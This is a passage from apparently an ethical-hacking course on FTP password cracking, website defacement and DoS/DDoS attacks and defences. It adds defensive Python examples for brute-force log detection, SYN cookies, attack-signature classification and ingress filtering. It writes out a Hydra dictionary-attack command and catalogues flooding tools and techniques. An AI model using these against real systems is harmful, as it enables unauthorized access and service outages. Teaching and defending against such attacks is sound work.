ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable,
Cisco AAA.
This tool is proof-of-concept code that gives researchers and security
consultants a way to show how easy it would be to gain unauthorized
remote access to a system. Note that a dictionary attack produces a
large volume of failed logins that show up in the target's logs and may
trigger account lockouts.
[68] www.insecure.in/hacktools_02.asp
Figure 10.1: (1) Target selection; (2) Login/password setup; (3) Hydra
start and output
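What the dictionary attack in this section looks like from the server's side, as an added example that is not part of the course text or of Hydra itself: a Python script that parses FTP server logs in the vsftpd style (the exact log layout is an assumption, and the sample lines below are constructed) and flags any client address with a burst of failed logins, recording whether a successful login followed the burst, which is the sign that one of the guesses worked.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the vsftpd log style (layout assumed); addresses are
# from the RFC 5737 documentation ranges and the user names are made up.
SAMPLE_LOG = """\
Mon Mar  4 10:15:01 2013 [pid 2110] [ftpuser] FAIL LOGIN: Client "203.0.113.7"
Mon Mar  4 10:15:01 2013 [pid 2111] [ftpuser] FAIL LOGIN: Client "203.0.113.7"
Mon Mar  4 10:15:02 2013 [pid 2112] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Mar  4 10:15:02 2013 [pid 2113] [candidinfo] FAIL LOGIN: Client "203.0.113.7"
Mon Mar  4 10:15:03 2013 [pid 2114] [candidinfo] FAIL LOGIN: Client "203.0.113.7"
Mon Mar  4 10:15:03 2013 [pid 2115] [candidinfo] OK LOGIN: Client "203.0.113.7"
Mon Mar  4 10:20:40 2013 [pid 2201] [candidinfo] FAIL LOGIN: Client "198.51.100.5"
Mon Mar  4 10:21:10 2013 [pid 2202] [candidinfo] OK LOGIN: Client "198.51.100.5"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$'
)


def parse_log(text):
    """Turn log lines into (timestamp, client_ip, user, result) tuples; lines
    that are not login results (connects, transfers) are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            events.append((ts, m["ip"], m["user"], m["result"]))
    return events


def detect_bruteforce(events, window_s=60, threshold=5):
    """Flag client IPs with >= threshold failed logins inside any window_s
    seconds. Returns {ip: {"failures", "users", "success_after"}}."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[1]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[3] == "FAIL"]
        lo, burst = 0, 0
        for hi in range(len(fails)):            # sliding window over the failures
            while (fails[hi][0] - fails[lo][0]).total_seconds() > window_s:
                lo += 1
            burst = max(burst, hi - lo + 1)
        if burst >= threshold:
            last_fail = fails[-1][0]
            findings[ip] = {
                "failures": len(fails),
                "users": sorted({e[2] for e in fails}),
                # a success at or after the last failure means a guess worked
                "success_after": any(e[3] == "OK" and e[0] >= last_fail for e in evs),
            }
    return findings


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_log(SAMPLE_LOG)).items():
        print(ip, info)
```

Hydra's command-line form of the GUI run in Figure 10.1 is hydra -L users.txt -P passwords.txt ftp://TARGET (user list, password list, service URL), and every guess it makes lands as one FAIL LOGIN line like those above, several per second from a single address; that burst, not any single line, is what the detector keys on. On a real host feed parse_log() the contents of the server's log file and act on any address whose success_after flag is set.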
10.3 Anonymous FTP Login[69]
You can allow anonymous FTP access to visitors wishing to download or
upload files to your web site, as if you were running your own FTP
server. You can enable and disable anonymous FTP access within your Web
Control Panel.
Anonymous FTP warnings:
Security
Anonymous FTP grants any and all users the ability to access your
"upload" directory, or any directory on your domain that has been set
for "public" read/write permissions. Anonymous users will be able to
upload files to and download files from your domain. You must set the
appropriate permissions on your directories to restrict anonymous FTP
access; this is needed to ensure that anonymous users cannot reach any
existing files or directories. On the provider's UNIX servers you can
restrict access to specific files and directories using the File Manager
by disabling public read and/or write access to the files or folders you
don't want people to see. A directory that anonymous users can write to
should not also be readable by them; otherwise it becomes a free file
drop for third parties.
[69] http://safire.net/support/anon_ftp.html
Responsibility
As the account owner, you are responsible for any and all files that are
stored on your domain. This includes files that were uploaded by you as
well as by anonymous FTP users. With anonymous FTP enabled, your site is
susceptible to becoming a "warez" site. Typically, these are sites used
by "hackers" to trade illegally pirated copies of software with one
another. As the account owner, the complete content of your account is
your responsibility. If your site becomes a trading post for "warez"
programs, you may face legal action by the programmers or software
companies that own the copyrighted software.
Data Transfer
Any and all FTP download transfers, anonymous FTP included, will be
used in the calculation of the total data transfer for your account. If this
total data transfer amount exceeds the limit that is set for your plan, you
will be responsible for any and all overage charges that occur. Once
anonymous FTP has been enabled, it will be your responsibility to
monitor the anonymous FTP activity for your account.
Disk Space
If you are going to allow people to upload files to your site, make sure
you keep track of your disk space usage via your Control Panel. Do not
allow your disk space usage to get too close to your maximum disk space
allocation or you may experience problems accessing your site via
FrontPage and/or be unable to upload or modify files. You may purchase
additional disk space if necessary.
Once you enable anonymous FTP, files can be accessed anonymously via an
FTP client or by using the following URL format:
ftp://ftp.yourdomain.com/<FILENAME>
Anonymous visitors wishing to access your site via an FTP client (e.g.
ws_ftp) must use the following information:
FTP hostname: yourdomain.com
userid: anonymous
Password: guest
(Most FTP servers accept any string as the anonymous password; by
convention clients send an e-mail address.)
10.4 Website Defacement
Website defacement is an attack on a website that changes the visual
appearance of the site. Defacements are typically the work of system
crackers who break into a web server and replace the hosted website with
one of their own.
A message is often left on the webpage stating the attacker's pseudonym
and the output of the "uname -a" and "id" commands, along with "shout
outs" to his or her friends. Sometimes the defacer makes fun of the
system administrator for failing to maintain server security. Most
times the defacement itself is harmless; however, it can also be used as
a distraction to cover up more sinister actions such as uploading
malware. Because the attacker needed write access to the web root to
change the page, a defacement should be treated as evidence of a server
compromise, not just as a cosmetic problem.[70]
[70] media.devilscafe.in
CHAPTER 11
DOS ATTACK
Objective
11.1 Introduction to DoS
11.2 Types of DoS Attacks
11.3 How DDoS Attacks Work
11.4 How BOTs/BOTNETs Work
11.5 Forms of Denial of Service
11.6 Tools for DoS Attacks
11.7 Countermeasures
11.1 Introduction to DoS[71]
A DoS (Denial of Service) attack is an attempt by a hacker to flood a
user's or an organization's system in order to make a computer resource
unavailable to its intended users. During a DoS attack, the hacker
renders a system unusable or significantly slows it down by overloading
its resources or preventing legitimate users from accessing it. These
attacks can be perpetrated against an individual system or an entire
network.
In a denial-of-service (DoS) attack, an attacker attempts to prevent
legitimate users from accessing information or services. By targeting your
computer and its network connection, or the computers and network of
the sites you are trying to use, an attacker may be able to prevent you
from accessing email, websites, online accounts (banking, etc.), or other
services that rely on the affected computer.
The most common and obvious type of DoS attack occurs when an
attacker "floods" a network with information. When you type a URL for a
particular website into your browser, you are sending a request to that
site's computer server to view the page. The server can only process a
certain number of requests at once, so if an attacker overloads the server
with requests, it can't process your request. This is a "denial of service"
because you can't access that site.
An attacker can use spam email messages to launch a similar attack on
your email account. Whether you have an email account supplied by your
employer or one available through a free service such as Yahoo or
Hotmail, you are assigned a specific quota, which limits the amount of
data you can have in your account at any given time. By sending many,
or large, email messages to the account, an attacker can consume your
quota, preventing you from receiving legitimate messages.
[71] http://en.wikipedia.org/wiki/Denial-of-service_attack
Although a DoS attack does not usually result in the theft of
information or other security loss, it can cost the target person or
company a great deal of time and money. Typically, the loss of service
is the inability of a particular network service, such as e-mail, to be
available, or the temporary loss of all network connectivity and
services. In some cases a DoS attack can also crash systems or corrupt
data on the affected computers, and DoS attacks have forced web sites
accessed by millions of people to temporarily cease operation.
Attacks can be directed at any network device, including routers and
web, electronic mail, or Domain Name System servers.
A DoS attack can be perpetrated in a number of ways. The five basic
types of attack are:[72]
1. Consumption of computational resources, such as bandwidth, disk
space, or processor time.
2. Disruption of configuration information, such as routing
information.
3. Disruption of state information, such as unsolicited resetting of
TCP sessions.
4. Disruption of physical network components.
5. Obstructing the communication media between the intended users
and the victim so that they can no longer communicate adequately.
A DoS attack may include execution of malware intended to:
- Max out the processor's usage, preventing any work from occurring.
- Trigger errors in the microcode of the machine.
- Trigger errors in the sequencing of instructions, so as to force the
computer into an unstable state or lock-up.
- Exploit errors in the operating system, causing resource starvation
and/or thrashing, i.e. using up all available facilities so no real
work can be accomplished.
- Crash the operating system itself.
[72] http://en.wikipedia.org/wiki/Denial-of-service_attack
Case Study: Stuxnet is a highly sophisticated computer worm. Discovered
in June 2010, Stuxnet spreads via Microsoft Windows and targets Siemens
industrial software and equipment. The worm spreads indiscriminately,
but includes a highly specialized payload designed to act only on
Siemens supervisory control and data acquisition (SCADA) systems that
are configured to control and monitor specific industrial processes.
Stuxnet infects PLCs by subverting the software application used to
reprogram these devices. The altered PLCs no longer run the processes
they were meant to control, so from the plant's point of view the effect
is a denial of service against the industrial process itself.
11.2 Types of DoS Attacks
There are two main categories of DoS attacks. A DoS attack can be sent
either by a single system to a single target (simple DoS) or by many
systems to a single target (DDoS). The goal of DoS isn't to gain
unauthorized access to machines or data, but to prevent legitimate users
of a service from using it.
i. DoS attack: a simple denial-of-service attack in which a single
system attacks a single target.
ii. DDoS attack: a DDoS (Distributed Denial-of-Service) attack is
perpetrated through BOTs and BOTNETs, which are compromised systems
that an attacker uses to launch the attack against the end victim.
The compromised system or network is a secondary victim, whereas
the DoS or DDoS traffic floods the primary victim, the target.
11.3. How DDoS Attacks Work
DDoS is an advanced version of the DoS attack. Like DoS, DDoS also
tries to deny access to services running on a system by sending packets
to the destination system in a way that the destination system can’t
handle. The key to a DDoS attack is that it relays attacks from many
different hosts (which must first be compromised), rather than from a
single host as in DoS. DDoS is a large-scale, coordinated attack on a
victim system.
The services under attack are those of the primary victim; the
compromised systems used to launch the attack are secondary victims.
These compromised systems, which send the DDoS to the primary
victim, are sometimes called zombies or BOTs. They’re usually
compromised through another attack and then used to launch an attack
on the primary victim at a certain time or under certain conditions. It
can be difficult to track the source of the attacks because they originate
from several IP addresses.
Normally, DDoS consists of three parts:
Master/Handler
Slave/secondary victim/zombie/agent/BOT/BOTNET
Victim /primary victim
Figure 11.1: DoS Attack
The master is the attack launcher. A slave is a host that is compromised
by and controlled by the master. The victim is the target system. The
master directs the slaves to launch the attack on the victim system.
DDoS is done in two phases. In the intrusion phase, the hacker
compromises weak systems in different networks around the world and
installs DDoS tools on those compromised slave systems. In the DDoS
attack phase, the slave systems are triggered to cause them to attack the
primary victim.
11.4 How BOTs/BOTNETs Work[73]
One of the most common and efficient DDoS attack methods is based on
using hundreds of zombie hosts. Zombies are usually controlled and
managed via IRC networks, using so-called botnets.
A BOT, short for web robot, is an automated software program that
behaves intelligently. Spammers often use BOTs to automate the posting
of spam messages on newsgroups or the sending of emails. BOTs can also
be used as remote attack tools. Most often, BOTs are web software agents
that interface with web pages; for example, web crawlers (spiders) are
web robots that gather web-page information. The most dangerous BOTs are
those that covertly install themselves on users' computers for
malicious purposes.
Some BOTs communicate with other users of Internet-based services via
instant messaging, Internet Relay Chat (IRC) or another web interface.
These BOTs allow IRC users to ask questions in plain English and then
formulate a proper response. Such BOTs can often handle many tasks,
including reporting weather, providing zip-code information, listing
sports scores, converting units of measure such as currency, and so on.
[73] http://www.infosecwriters.com/text_resources/pdf/DSlee_Denial_of_Service_Attacks.pdf
Figure 11.2: BOTNETs
A BOTNET is a group of BOT systems. BOTNETs serve various purposes,
including DDoS attacks, creation or misuse of Simple Mail Transfer
Protocol (SMTP) mail relays for spam, Internet marketing fraud, and the
theft of application serial numbers, login IDs, and financial
information such as credit card numbers.
Generally a BOTNET refers to a group of compromised systems running a
BOT for the purpose of launching a coordinated DDoS attack.
11.5 Forms of Denial of Service[74]
Common forms of denial of service attacks are:
i. Buffer Overflow Attacks
A common kind of DoS attack is simply to send more data to a network
service than the programmers who sized its buffers anticipated anyone
would send. The attacker may know that the target system has a weakness
that can be exploited, or may simply try the attack in case it works. A
few of the better-known attacks based on the buffer handling of a
program or system include:
- Sending e-mail messages that have attachments with 256-character file
names to Netscape and Microsoft mail programs.
- Sending oversized Internet Control Message Protocol (ICMP) packets
(also known as the "ping of death").
- Sending a user of the Pine e-mail program a message with a "From"
address larger than 256 characters.
[74] http://en.wikipedia.org/wiki/Denial-of-service_attack
ii. Smurf Attack
A smurf attack sends a large amount of ICMP echo (ping) traffic to a
broadcast IP address with the spoofed source address of a victim. Each
secondary victim's host on that IP network replies to the ICMP echo
request with an echo reply, multiplying the traffic by the number of
hosts responding. On a multi-access broadcast network, hundreds of
machines might reply to each packet. This creates a magnified DoS attack
of ping replies, flooding the primary victim. IRC servers were
historically the main victims of smurf attacks on the Internet.
In this attack, the perpetrator sends an IP ping (or "echo my message
back to me") request to a receiving site. The ping packet is addressed
so that it is broadcast to a number of hosts within the receiving site's
local network. The packet also indicates that the request is from
another site, the target site that is to receive the denial of service.
(Sending a packet with someone else's return address in it is called
spoofing the return address.) The result is lots of ping replies
flooding back to the innocent, spoofed host. If the flood is great
enough, the spoofed host will no longer be able to receive or
distinguish real traffic. The attack only works if the intermediate
network's router forwards directed broadcasts, which is why disabling
directed-broadcast forwarding on every router interface is the standard
defence.
iii. SYN Flooding
A SYN flood attack sends TCP connection requests faster than a machine
can process them. The attacker creates a random source address for each
packet and sets the SYN flag to request a new connection to the server
from the spoofed IP address. The victim responds to the spoofed IP
address with a SYN-ACK and then waits for the final ACK of the
handshake, which never arrives. Consequently, the victim's connection
table fills up with half-open connections; once the table is full, all
new connection requests are ignored. Legitimate users are ignored as
well, and can't reach the server. Some of the methods used to prevent
SYN flood attacks are SYN cookies, RST cookies, micro blocks, and stack
tweaking.
When a session is initiated between a Transmission Control Protocol
(TCP) client and server, only a small buffer (the listen backlog) exists
to hold the usually rapid "handshake" exchange of messages that sets up
the session. The session-establishing packets carry the SYN flag and an
initial sequence number that identifies the sequence in the message
exchange. An attacker can send a number of connection requests very
rapidly and then fail to respond to the reply. This leaves each
half-open entry in the buffer so that other, legitimate connection
requests can't be accommodated. Although an entry is dropped after a
certain period of time without a reply, the effect of many of these
bogus connection requests is to make it difficult for legitimate
sessions to get established. In general, defending against this depends
on the operating system providing correct settings or allowing the
network administrator to tune the size of the backlog and the timeout
period.
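How SYN cookies, the first countermeasure named above, let a server survive the flood, as an added example that is not part of the course text and not the exact scheme of any particular operating system: instead of recording each half-open connection, the server puts a keyed MAC of the connection's addresses, ports and client sequence number (plus a coarse time counter) into its own initial sequence number, and allocates state only when the final ACK echoes that number back. The cookie layout, the counter period and the secret are this example's own choices; the toy listener and the traffic are constructed.

```python
import hashlib
import hmac
import os

SECRET = os.urandom(16)     # per-host secret; a real stack rotates it (assumption)
COUNTER_PERIOD = 64         # seconds per time-counter tick (this example's choice)


def _mac(src_ip, src_port, dst_ip, dst_port, client_isn, counter):
    """24-bit MAC over the 4-tuple, the client's ISN and the time counter."""
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{client_isn}|{counter}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, now):
    """Server ISN for the SYN-ACK: top 8 bits = time counter, low 24 bits = MAC.
    Nothing about the connection is stored on the server."""
    counter = (now // COUNTER_PERIOD) & 0xFF
    return (counter << 24) | _mac(src_ip, src_port, dst_ip, dst_port, client_isn, counter)


def check_cookie(src_ip, src_port, dst_ip, dst_port, ack_seq, ack_ack, now, max_age_ticks=1):
    """Validate the handshake's final ACK: ack_ack-1 must be a cookie we would
    have issued for this 4-tuple within the last max_age_ticks counter ticks."""
    cookie = (ack_ack - 1) & 0xFFFFFFFF
    client_isn = (ack_seq - 1) & 0xFFFFFFFF
    counter = cookie >> 24
    now_counter = (now // COUNTER_PERIOD) & 0xFF
    if ((now_counter - counter) & 0xFF) > max_age_ticks:
        return False                                   # stale cookie
    expected = _mac(src_ip, src_port, dst_ip, dst_port, client_isn, counter)
    return hmac.compare_digest(expected.to_bytes(3, "big"),
                               (cookie & 0xFFFFFF).to_bytes(3, "big"))


class Listener:
    """Toy TCP listener in either classic (backlog table) or SYN-cookie mode."""
    CLASSIC_ISN = 0x10000000   # fixed server ISN in classic mode, for simplicity

    def __init__(self, ip, port, backlog=128, use_cookies=False):
        self.ip, self.port, self.backlog, self.use_cookies = ip, port, backlog, use_cookies
        self.half_open = {}        # (src_ip, src_port) -> client ISN; classic mode only
        self.established = set()

    def on_syn(self, src_ip, src_port, client_isn, now):
        """Returns the ISN sent in the SYN-ACK, or None if the SYN was dropped."""
        if self.use_cookies:
            return make_cookie(src_ip, src_port, self.ip, self.port, client_isn, now)
        if len(self.half_open) >= self.backlog:
            return None            # table full: exactly what the flood aims for
        self.half_open[(src_ip, src_port)] = client_isn
        return self.CLASSIC_ISN

    def on_ack(self, src_ip, src_port, seq, ack, now):
        """Returns True if the final ACK establishes the connection."""
        key = (src_ip, src_port)
        if self.use_cookies:
            if not check_cookie(src_ip, src_port, self.ip, self.port, seq, ack, now):
                return False
        else:
            if self.half_open.get(key) is None or (ack - 1) & 0xFFFFFFFF != self.CLASSIC_ISN:
                return False
            del self.half_open[key]
        self.established.add(key)
        return True


def simulate(use_cookies, flood=10_000):
    """Spoofed SYN flood (no ACK ever comes back) followed by one legitimate
    handshake; returns whether the legitimate client got connected."""
    srv = Listener("192.0.2.10", 21, backlog=128, use_cookies=use_cookies)
    now = 1_000_000
    for i in range(flood):
        srv.on_syn(f"198.51.100.{i % 254 + 1}", 1024 + (i % 60000), i, now)
    isn = srv.on_syn("203.0.113.7", 40000, 777, now)
    if isn is None:
        return False
    return srv.on_ack("203.0.113.7", 40000, 778, (isn + 1) & 0xFFFFFFFF, now + 1)


if __name__ == "__main__":
    print("classic backlog, client connected:", simulate(use_cookies=False))
    print("SYN cookies,     client connected:", simulate(use_cookies=True))
```

The price of the trick is visible in the code: the server cannot remember options the client offered in its SYN (window scaling, SACK) because nothing is stored, which is why real stacks only switch to cookies once the backlog is full, and why the counter check is needed at all, since a cookie with no expiry could be replayed indefinitely.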
iv. Teardrop Attack
This type of denial of service attack exploits the way the Internet
Protocol (IP) requires a packet that is too large for the next router to
handle to be divided into fragments. Each fragment carries an offset
from the beginning of the original packet that enables the receiving
system to reassemble the whole packet. In the teardrop attack, the
attacker sets an overlapping offset value in the second or later
fragment. If the receiving operating system's reassembly code does not
handle overlapping fragments correctly, it can cause the system to
crash.
11.6 Tools for DoS Attacks
i. Ping of Death is an attack that can cause a system to lock up by
sending an ICMP echo request in IP fragments that add up to more than
the 65,535-byte maximum IP packet size when reassembled. Ping of Death
can cause DoS to clients trying to access the server that has been a
victim of the attack.
ii. SSPing is a program that sends several large fragmented Internet
Control Message Protocol (ICMP) data packets to a target system. This
causes the computer receiving the data packets to freeze when it tries
to reassemble the fragments.
A LAND attack sends a packet to a system where the source IP address and
port are set to match the target system's own IP address and port. As a
result, the system attempts to reply to itself, causing a loop that ties
up system resources and may eventually crash the OS.
iii. CPU Hog is a DoS attack tool that uses up the CPU resources on a
target system, making it unavailable to the user.
iv. WinNuke is a program that looks for a target system with TCP port
139 (NetBIOS) open and sends out-of-band (OOB) data to that port. This
attack is also known as an Out-of-Band (OOB) attack; the unpatched
Windows IP stack could not handle the OOB data, and the system crashes.
v. Jolt2 is a DoS tool that sends a large number of fragmented IP
packets to a Windows target. These tie up system resources and
eventually lock up the system. Jolt2 isn't Windows-specific: many Cisco
routers and other gateways were also vulnerable to the Jolt2 attack.
vi. Bubonic is a DoS tool that works by sending TCP packets with random
settings in order to increase the load on the target machine so that it
eventually crashes.
vii. Targa is a program that can be used to run eight different DoS
attacks. The attacker has the option to either launch individual attacks
or try all of the attacks until one is successful.
viii. RPC Locator is a Windows service that, if unpatched, has a buffer
overflow vulnerability. The RPC Locator service allows distributed
applications to run on the network. It is susceptible to DoS attacks,
and many of the tools that perform DoS attacks exploit this
vulnerability.
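The packet-level signatures of the attacks described in 11.5 and 11.6 (smurf, LAND, ping of death, teardrop and SYN flood), as an added example that is not part of the course text: a Python classifier run over a constructed stream of packet summaries. The dictionaries stand in for parsed IP/ICMP/TCP headers and their field names are this example's own; nothing is captured from a real network.

```python
import ipaddress
from collections import defaultdict

IP_MAX_LEN = 65535
LOCAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]   # the protected LAN (constructed)


def _is_broadcast(dst, local_nets):
    addr = ipaddress.ip_address(dst)
    return str(addr) == "255.255.255.255" or any(addr == n.broadcast_address for n in local_nets)


def classify(packets, local_nets, syn_threshold=50):
    """Run the signature checks over packet summaries; returns (signature, detail) findings."""
    findings = []
    frag_end = {}                    # (src, dst, ip_id) -> highest byte reassembled so far
    syn_sources = defaultdict(set)   # (dst, dport) -> sources that sent a bare SYN
    ack_sources = defaultdict(set)   # (dst, dport) -> sources that completed the handshake
    for p in packets:
        src, dst = p["src"], p["dst"]
        if src == dst:                                   # LAND: the host replies to itself
            findings.append(("LAND", f"{src} -> {dst}"))
        if p["proto"] == "icmp" and p.get("type") == 8 and _is_broadcast(dst, local_nets):
            findings.append(("smurf", f"echo request from {src} to broadcast {dst}"))
        if p.get("frag_off") is not None:                # fragment bookkeeping
            start = p["frag_off"] * 8                    # the offset field counts 8-byte units
            end = start + p["len"]
            key = (src, dst, p["ip_id"])
            if end > IP_MAX_LEN:                         # ping of death
                findings.append(("ping_of_death", f"{key} reassembles to {end} bytes"))
            prev_end = frag_end.get(key, 0)
            if prev_end and start < prev_end:            # teardrop: overlapping fragment
                findings.append(("teardrop", f"{key} fragment at {start} overlaps {prev_end}"))
            frag_end[key] = max(prev_end, end)
        if p["proto"] == "tcp":
            key = (dst, p["dport"])
            if p["flags"] == {"SYN"}:
                syn_sources[key].add(src)
            elif "ACK" in p["flags"] and "SYN" not in p["flags"]:
                ack_sources[key].add(src)
    for key, srcs in syn_sources.items():                # SYN flood: many half-open sources
        half_open = srcs - ack_sources[key]
        if len(half_open) >= syn_threshold:
            findings.append(("syn_flood", f"{key[0]}:{key[1]} {len(half_open)} half-open sources"))
    return findings


def sample_stream():
    """Constructed packet summaries, one instance of each attack plus normal traffic."""
    pkts = [  # normal: a completed handshake to the web server
        {"src": "203.0.113.9", "dst": "192.0.2.10", "proto": "tcp", "dport": 80, "flags": {"SYN"}},
        {"src": "203.0.113.9", "dst": "192.0.2.10", "proto": "tcp", "dport": 80, "flags": {"ACK"}},
        # smurf: echo request to the LAN broadcast address with a spoofed source
        {"src": "198.51.100.1", "dst": "192.0.2.255", "proto": "icmp", "type": 8},
        # LAND: source equals destination
        {"src": "192.0.2.10", "dst": "192.0.2.10", "proto": "tcp", "dport": 139, "flags": {"SYN"}},
        # ping of death: last fragment of an echo request that exceeds 65,535 bytes
        {"src": "198.51.100.2", "dst": "192.0.2.10", "proto": "icmp", "type": 8,
         "ip_id": 7, "frag_off": 8180, "len": 1480},
        # teardrop: second fragment starts inside the first one
        {"src": "198.51.100.3", "dst": "192.0.2.10", "proto": "udp", "ip_id": 9, "frag_off": 0, "len": 36},
        {"src": "198.51.100.3", "dst": "192.0.2.10", "proto": "udp", "ip_id": 9, "frag_off": 3, "len": 36},
    ]
    for i in range(60):  # SYN flood: 60 spoofed sources, none of which completes
        pkts.append({"src": f"198.51.100.{100 + i}", "dst": "192.0.2.10",
                     "proto": "tcp", "dport": 80, "flags": {"SYN"}})
    return pkts


def classify_sample():
    return classify(sample_stream(), LOCAL_NETS)


if __name__ == "__main__":
    for sig, detail in classify_sample():
        print(sig, detail)
```

The SYN-flood rule counts distinct half-open sources rather than raw SYN rate, so a single busy but legitimate client is not flagged, while the spoofed, never-completing sources of a flood are; on a real sensor the same logic would run over a rolling time window instead of a finished list.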
Tools for DDoS Attacks
i. Trinoo is a tool that sends User Datagram Protocol (UDP) traffic to
create a DDoS attack. The Trinoo master is a system used to launch a DoS
attack against one or more target systems. The master instructs agent
processes called daemons, on previously compromised systems (secondary
victims), to attack one or more IP addresses. The attack runs for a
specified period of time. The Trinoo agent or daemon is installed on a
system that suffers from a buffer overflow vulnerability. WinTrinoo is a
Windows version of Trinoo with the same functionality.
ii. Shaft is a derivative of the Trinoo tool that uses UDP
communication between masters and agents. Shaft provides statistics on
the flood attack that attackers can use to know when the victim system
is down; it offers UDP, ICMP, and TCP flooding attack options.
iii. Tribe Flood Network (TFN) allows an attacker to use both
bandwidth-depletion and resource-depletion attacks. TFN does UDP and
ICMP flooding as well as TCP SYN and smurf attacks. TFN2K is based on
TFN, with features designed specifically to make TFN2K traffic difficult
to recognize and filter. It remotely executes commands, hides the
source of the attack using IP address spoofing, and uses multiple
transport protocols including UDP, TCP, and ICMP.
iv. Stacheldraht is similar to TFN and includes ICMP flood, UDP flood,
and TCP SYN attack options. It also provides an encrypted Telnet-like
connection (using symm


etric-key encryption) between the attacker and
the agent systems (secondary victims), which prevents system
administrators from reading and identifying this traffic by content.
v. Mstream uses spoofed TCP packets with the ACK flag set to attack a
target. It consists of a handler and an agent portion, and access to
the handler is password protected.
11.7 DoS/DDoS Countermeasures[75]
There are several ways to detect, halt, or prevent DoS attacks. The
following are common security features available:
i. Network-ingress filtering
All network access providers should implement network-ingress filtering
(BCP 38) to stop any downstream network from injecting packets with
faked or spoofed source addresses into the Internet. Although this
doesn't stop an attack from occurring, it does make it much easier to
track down the source of the attack and terminate it quickly.
ii. Rate-limiting network traffic
A number of routers on the market today have features that let you
limit the amount of bandwidth some types of traffic can consume. This is
sometimes referred to as traffic shaping.
iii. Intrusion detection systems
Use an intrusion detection system (IDS) to detect attackers who are
communicating with slave, master, or agent machines. Doing so lets you
know whether a machine in your network is being used to launch a known
attack, but it probably won't detect new variations of these attacks or
the tools that implement them. Most IDS vendors have signatures to
detect Trinoo, TFN, or Stacheldraht network traffic.
iv. Host-auditing tools
File-scanning tools are available that attempt to detect the presence
of known DDoS tool client and server binaries on a system.
v. Network-auditing tools
Network-scanning tools are available that attempt to detect the
presence of DDoS agents running on hosts on your network.
[75] http://certifiedethicalhackerceh.blogspot.in/2012/05/dosddos-countermeasures.html
vi. Automated network-tracing tools
Tracing streams of packets with spoofed addresses through the network
is a time-consuming task that requires the cooperation of all networks
carrying the traffic and must be completed while the attack is in
progress.
vii. DoS scanning tools
Find_ddos is a tool that scans a local system for known DDoS agent
programs. It can detect several known DoS attack tools.
SARA gathers information about remote hosts and networks by examining
network services. This includes information about the network
information services as well as potential security flaws, such as
incorrectly set up or configured network services, well-known bugs in
system or network utilities, system software vulnerabilities listed in
the Common Vulnerabilities and Exposures (CVE) database, and weak policy
decisions.
RID is a free scanning tool that detects the presence of Trinoo, TFN,
or Stacheldraht clients. Zombie Zapper instructs zombie routines to go
to sleep, thus stopping their attack; it uses the same commands an
attacker would use to stop the attack.
viii. Switches
Most switches have some rate-limiting and ACL capability. Some switches
provide automatic and/or system-wide rate limiting, traffic shaping,
delayed binding (TCP splicing), deep packet inspection and bogon
filtering (filtering of addresses that should never appear on the
Internet) to detect and remediate denial of service attacks through
automatic rate filtering and WAN link failover and balancing.
These schemes work as long as the DoS attacks are of a kind they can
prevent. For example, a SYN flood can be prevented using delayed binding
or TCP splicing. Similarly, content-based DoS can be prevented using
deep packet inspection. Attacks originating from or going to dark
addresses can be prevented using bogon filtering. Automatic rate
filtering works as long as you have set rate thresholds correctly and
granularly. WAN link failover works as long as both links have a
DoS/DDoS prevention mechanism.
ix. Routers
Similar to switches, routers have some rate-limiting and ACL
capability. They, too, are manually configured. Cisco IOS, for example,
has features that help prevent flooding.
x. Application front-end hardware
Application front-end hardware is intelligent hardware placed on the
network before traffic reaches the servers. It can be used on networks
in conjunction with routers and switches. Application front-end
hardware analyzes data packets as they enter the system, and then
identifies them as priority, regular, or dangerous.
xi. IPS-based prevention
Intrusion-prevention systems (IPS) are effective if the attacks have
signatures associated with them. However, the trend among attacks is to
have legitimate content but bad intent. Intrusion-prevention systems
that work on content recognition cannot block behavior-based DoS
attacks.
An ASIC-based IPS can detect and block denial of service attacks
because it has the processing power and the granularity to analyze the
attacks and act like a circuit breaker in an automated way.
A rate-based IPS (RBIPS) must analyze traffic granularly and
continuously monitor the traffic pattern to determine whether there is
a traffic anomaly. It must let legitimate traffic flow while blocking
the DoS attack traffic.
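Three of the countermeasures above, network-ingress filtering, bogon filtering and rate limiting, written out as one filter over packet summaries, as an added example that is not part of the course text and not any vendor's implementation. The customer prefix, the bogon list and the ICMP rate are this example's choices, and the traffic is constructed; the RFC 5737 documentation ranges stand in for public addresses.

```python
import ipaddress

# Prefixes that must never appear as a source address on the public Internet
# (RFC 1122, 1918, 3927, 6598 and the multicast/reserved block). A production
# bogon list is longer and changes over time; this one is this example's
# choice. The RFC 5737 documentation ranges are used below as stand-ins for
# public addresses, so they are deliberately not listed here.
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.0.0.0/24", "192.168.0.0/16", "198.18.0.0/15",
    "224.0.0.0/3",
)]


class IngressFilter:
    """Model of an access router's customer-facing interface: BCP 38 source
    check, bogon check, then a token-bucket rate limit on ICMP."""

    def __init__(self, customer_prefixes, icmp_rate_pps=10, icmp_burst=20):
        self.customer = [ipaddress.ip_network(p) for p in customer_prefixes]
        self.rate, self.capacity = float(icmp_rate_pps), float(icmp_burst)
        self.tokens, self.last = float(icmp_burst), 0.0

    def _icmp_allowed(self, now):
        # refill in proportion to elapsed time, capped at the burst size
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

    def decide(self, pkt, now):
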